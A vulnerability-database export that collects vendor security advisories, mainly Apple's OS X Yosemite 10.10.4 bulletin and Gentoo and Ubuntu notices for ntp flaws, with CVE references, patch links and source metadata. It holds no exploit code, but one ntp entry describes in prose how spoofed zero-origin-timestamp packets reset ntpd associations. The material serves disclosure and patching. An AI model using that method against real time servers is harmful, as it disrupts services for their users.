OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker in a privileged position may be able to perform\na denial of service attack against two ntp clients\nDescription: Multiple issues existed in the authentication of ntp\npackets being received by configured end-points. These issues were\naddressed through improved connection state management. \nCVE-ID\nCVE-2015-1798\nCVE-2015-1799\n\nOpenSSL\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Multiple issues exist in OpenSSL, including one that may\nallow an attacker to intercept connections to a server that supports\nexport-grade ciphers\nDescription: Multiple issues existed in OpenSSL 0.9.8zd which were\naddressed by updating OpenSSL to version 0.9.8zf. \nCVE-ID\nCVE-2015-0209\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0293\n\nQuickTime\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in QuickTime. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3661 : G. Geshev working with HP\u0027s Zero Day Initiative\nCVE-2015-3662 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3663 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3666 : Steven Seeley of Source Incite working with HP\u0027s Zero\nDay Initiative\nCVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai\nLu of Fortinet\u0027s FortiGuard Labs, Ryan Pentney, and Richard Johnson\nof Cisco Talos and Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3668 : Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3713 : Apple\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in the Security framework\ncode for parsing S/MIME e-mail and some other signed or encrypted\nobjects. This issue was addressed through improved validity checking. \nCVE-ID\nCVE-2013-1741\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Tampered applications may not be prevented from launching\nDescription: Apps using custom resource rules may have been\nsusceptible to tampering that would not have invalidated the\nsignature. This issue was addressed with improved resource\nvalidation. \nCVE-ID\nCVE-2015-3714 : Joshua Pitts of Leviathan Security Group\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to bypass code signing\nchecks\nDescription: An issue existed where code signing did not verify\nlibraries loaded outside the application bundle. This issue was\naddressed with improved bundle verification. \nCVE-ID\nCVE-2015-3715 : Patrick Wardle of Synack\n\nSpotlight\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Searching for a malicious file with Spotlight may lead to\ncommand injection\nDescription: A command injection vulnerability existed in the\nhandling of filenames of photos added to the local photo library. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2015-3716 : Apple\n\nSQLite\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: Multiple buffer overflows existed in SQLite\u0027s printf\nimplementation. These issues were addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3717 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nSystem Stats\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious app may be able to compromise systemstatsd\nDescription: A type confusion issue existed in systemstatsd\u0027s\nhandling of interprocess communication. By sending a maliciously\nformatted message to systemstatsd, it may have been possible to\nexecute arbitrary code as the systemstatsd process. The issue was\naddressed through additional type checking. \nCVE-ID\nCVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nTrueTypeScaler\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team\n\nzip\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Extracting a maliciously crafted zip file using the unzip\ntool may lead to an unexpected application termination or arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in the\nhandling of zip files. These issues were addressed through improved\nmemory handling. \nCVE-ID\n\nCVE-2014-8139\nCVE-2014-8140\nCVE-2014-8141\n\n\nOS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. \nhttps://support.apple.com/en-us/HT204950\n\nOS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJVksFmAAoJEBcWfLTuOo7tV1AQAIYpkOMpHp181b+70sgyZ/Ue\nmFM527FFGDfLLuIW6LTcBsEFe9cfZxumB8eOFPirTNRK7krsVMo1W+faHXyWOnx7\nkbWylHdhaoxnX+A6Gj0vP71V6TNNsTi9+2dmdmHUnwxZ7Ws5QCNKebumUG3MMXXo\nEKxE5SNSNKyMSSYmliS26cdl8fWrmg9qTxiZQnxjOCrg/CNAolgVIRRfdMUL7i4w\naGAyrlJXOxFOuNkqdHX2luccuHFV7aW/dIXQ4MyjiRNl/bWrBQmQlneLLpPdFZlH\ncMfGa2/baaNaCbU/GqhNKbO4fKYVaqQWzfUrtqX0+bRv2wmOq33ARy9KE23bYTvL\nU4E9x9z87LsLXGAdjUi6MDe5g87DcmwIEigfF6/EHbDYa/2VvSdIa74XRv/JCN1+\naftHLotin76h4qV/dCAPf5J/Fr/1KFCM0IphhG7p+7fVTfyy7YDXNBiKCEZzLf8U\nTUWLUCgQhobtakqwzQJ5qyF8u63xzVXj8oeTOw6iiY/BLlj9def5LMm/z6ZKGTyC\n3c4+Sy5XvBHZoeiwdcndTVpnFbmmjZRdeqtdW/zX5mHnxXPa3lZiGoBDhHQgIg6J\n1tTVtnO1JSLXVYDR6Evx1EH10Vgkt2wAGTLjljSLwtckoEqc78qMAT1G5U4nFffI\n+gGm5FbAxjxElgA/gbaq\n=KLda\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2015-1798" }, { "db": "CERT/CC", "id": "VU#374268" }, { "db": "BID", "id": "73950" }, { "db": "BID", "id": "73951" }, { "db": "VULMON", "id": "CVE-2015-1798" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "132518" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#374268", "trust": 3.1 }, { "db": "NVD", "id": "CVE-2015-1798", "trust": 2.9 }, { "db": "BID", "id": "73951", "trust": 2.0 }, { "db": "SECTRACK", "id": "1032032", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10114", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201504-094", "trust": 0.6 }, { "db": "BID", "id": "73950", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2015-1798", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131582", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131941", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131385", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131405", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134448", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132518", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "VULMON", "id": "CVE-2015-1798" }, { "db": "BID", "id": "73950" }, { "db": "BID", "id": "73951" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "CNNVD", "id": "CNNVD-201504-094" }, { "db": "NVD", "id": "CVE-2015-1798" } ] }, "id": "VAR-201504-0361", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.478814715 }, "last_update_date": "2024-07-23T20:49:39.732000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "ntp-4.2.8p2", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=54863" }, { "title": "Red Hat: Moderate: ntp security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152231 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: ntp: CVE-2015-1798 CVE-2015-1799", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d133e5923f2516253cdb12d9d3c37c05" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2567-1" }, { "title": "Red Hat: CVE-2015-1798", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-1798" }, { "title": "Debian Security Advisories: DSA-3223-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d552cdc6350071420c8916bcaed96264" }, { "title": "Amazon Linux AMI: ALAS-2015-520", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-520" }, { "title": "Cisco: Multiple Vulnerabilities in ntpd (April 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150408-ntpd" }, { "title": "Apple: OS X Yosemite v10.10.4 and Security Update 2015-005", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=50398602701d671602946005c7864211" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=2a43c5799a7dd07d6c0a92a3b040d12f" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/04/09/ntp_vulns/" }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/04/09/cisco_security_software_needs_security_patch/" }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/two-ntp-key-authentication-vulnerabilities-patched/112067/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-1798" }, { "db": "CNNVD", "id": "CNNVD-201504-094" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-17", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2015-1798" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.6, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 2.5, "url": "http://bugs.ntp.org/show_bug.cgi?id=2779" }, { "trust": 2.3, "url": "http://www.kb.cert.org/vuls/id/374268" }, { "trust": 2.3, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150408-ntpd" }, { "trust": 2.3, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 2.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=38276" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2567-1" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1032032" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:202" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/73951" }, { "trust": 1.7, "url": "http://www.debian.org/security/2015/dsa-3223" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-april/155863.html" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10114" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2015-04/msg00052.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-april/155864.html" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html" }, { "trust": 1.7, "url": "http://support.apple.com/kb/ht204942" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=143213867103400\u0026w=2" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html" }, { "trust": 1.7, "url": "https://security.gentoo.org/glsa/201509-01" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2015-1459.html" }, { "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2781" }, { "trust": 0.8, "url": "http://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynoticehttp://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "https://access.redhat.com/security/cve/cve-2015-1798" }, { "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.6, "url": "http://www.ntp.org" }, { "trust": 0.6, "url": "http://seclists.org/bugtraq/2015/apr/156" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679309" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022814" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966578" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975967" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000111" }, { "trust": 0.6, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2015-006-symmetric-key-ntp/?q=cve-2015-1798\u0026l=en_us\u0026fs=search\u0026pn=1" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1798" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1799" }, { "trust": 0.6, "url": "https://access.redhat.com/errata/rhsa-2015:1459" }, { "trust": 0.6, "url": "https://access.redhat.com/errata/rhsa-2015:2231" }, { "trust": 0.6, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1199430" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory3.asc" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2015-1799" }, { "trust": 0.3, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=38275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022831" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp4_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2015-1798" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1799" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1798" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/17.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://threatpost.com/two-ntp-key-authentication-vulnerabilities-patched/112067/" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2567-1/" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.3" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3405" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2231.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9298" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9751" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9298" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3673" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8141" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3672" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8127" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3661" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3671" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1741" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8128" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8130" }, { "trust": 0.1, "url": "https://support.apple.com/en-" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8139" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3662" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8129" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1157" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://support.apple.com/en-us/ht204950" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3663" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3668" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3666" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3667" } ], "sources": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "VULMON", "id": "CVE-2015-1798" }, { "db": "BID", "id": "73950" }, { "db": "BID", "id": "73951" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "CNNVD", "id": "CNNVD-201504-094" }, { "db": "NVD", "id": "CVE-2015-1798" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "VULMON", "id": "CVE-2015-1798" }, { "db": "BID", "id": "73950" }, { "db": "BID", "id": "73951" }, { "db": "PACKETSTORM", "id": "131582" }, { "db": "PACKETSTORM", "id": "131941" }, { "db": "PACKETSTORM", "id": "131385" }, { "db": "PACKETSTORM", "id": "131405" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "132518" }, { "db": "CNNVD", "id": "CNNVD-201504-094" }, { "db": "NVD", "id": "CVE-2015-1798" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-07T00:00:00", "db": "CERT/CC", "id": "VU#374268" }, { "date": "2015-04-08T00:00:00", "db": "VULMON", "id": "CVE-2015-1798" }, { "date": "2015-04-07T00:00:00", "db": "BID", "id": "73950" }, { "date": "2015-04-07T00:00:00", "db": "BID", "id": "73951" }, { "date": "2015-04-22T20:14:29", "db": "PACKETSTORM", "id": "131582" }, { "date": "2015-05-20T23:06:21", "db": "PACKETSTORM", "id": "131941" }, { "date": "2015-04-13T14:03:24", "db": "PACKETSTORM", "id": "131385" }, { "date": "2015-04-14T18:53:39", "db": "PACKETSTORM", "id": "131405" }, { "date": "2015-11-20T00:42:01", "db": "PACKETSTORM", "id": "134448" }, { "date": "2015-07-01T05:31:53", "db": "PACKETSTORM", "id": "132518" }, { "date": "2015-04-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201504-094" }, { "date": "2015-04-08T10:59:04.610000", "db": "NVD", "id": "CVE-2015-1798" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-10T00:00:00", "db": "CERT/CC", "id": "VU#374268" }, { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2015-1798" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "73950" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "73951" }, { "date": "2023-04-10T00:00:00", "db": "CNNVD", "id": "CNNVD-201504-094" }, { "date": "2023-02-12T23:15:30.947000", "db": "NVD", "id": "CVE-2015-1798" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "73950" }, { "db": "BID", "id": "73951" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project ntpd reference implementation contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#374268" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201504-094" } ], "trust": 0.6 } }
var-201803-1822
Vulnerability from variot
The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the "other side" of an interleaved association causing the victim ntpd to reset its association. ntp Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. NTP version 4.2.6 prior to 4.2.8p11 are vulnerable. protocol engine is one of the protocol engines. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201805-12
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: May 26, 2018 Bugs: #649612 ID: 201805-12
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to remote code execution.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p11 >= 4.2.8_p11
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p11"
References
[ 1 ] CVE-2018-7170 https://nvd.nist.gov/vuln/detail/CVE-2018-7170 [ 2 ] CVE-2018-7182 https://nvd.nist.gov/vuln/detail/CVE-2018-7182 [ 3 ] CVE-2018-7183 https://nvd.nist.gov/vuln/detail/CVE-2018-7183 [ 4 ] CVE-2018-7184 https://nvd.nist.gov/vuln/detail/CVE-2018-7184 [ 5 ] CVE-2018-7185 https://nvd.nist.gov/vuln/detail/CVE-2018-7185
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201805-12
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-3707-2 January 23, 2019
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
Several security issues were fixed in NTP.
Software Description: - ntp: Network Time Protocol daemon and utility programs
Details:
USN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This update provides the corresponding update for Ubuntu 12.04 ESM.
Original advisory details:
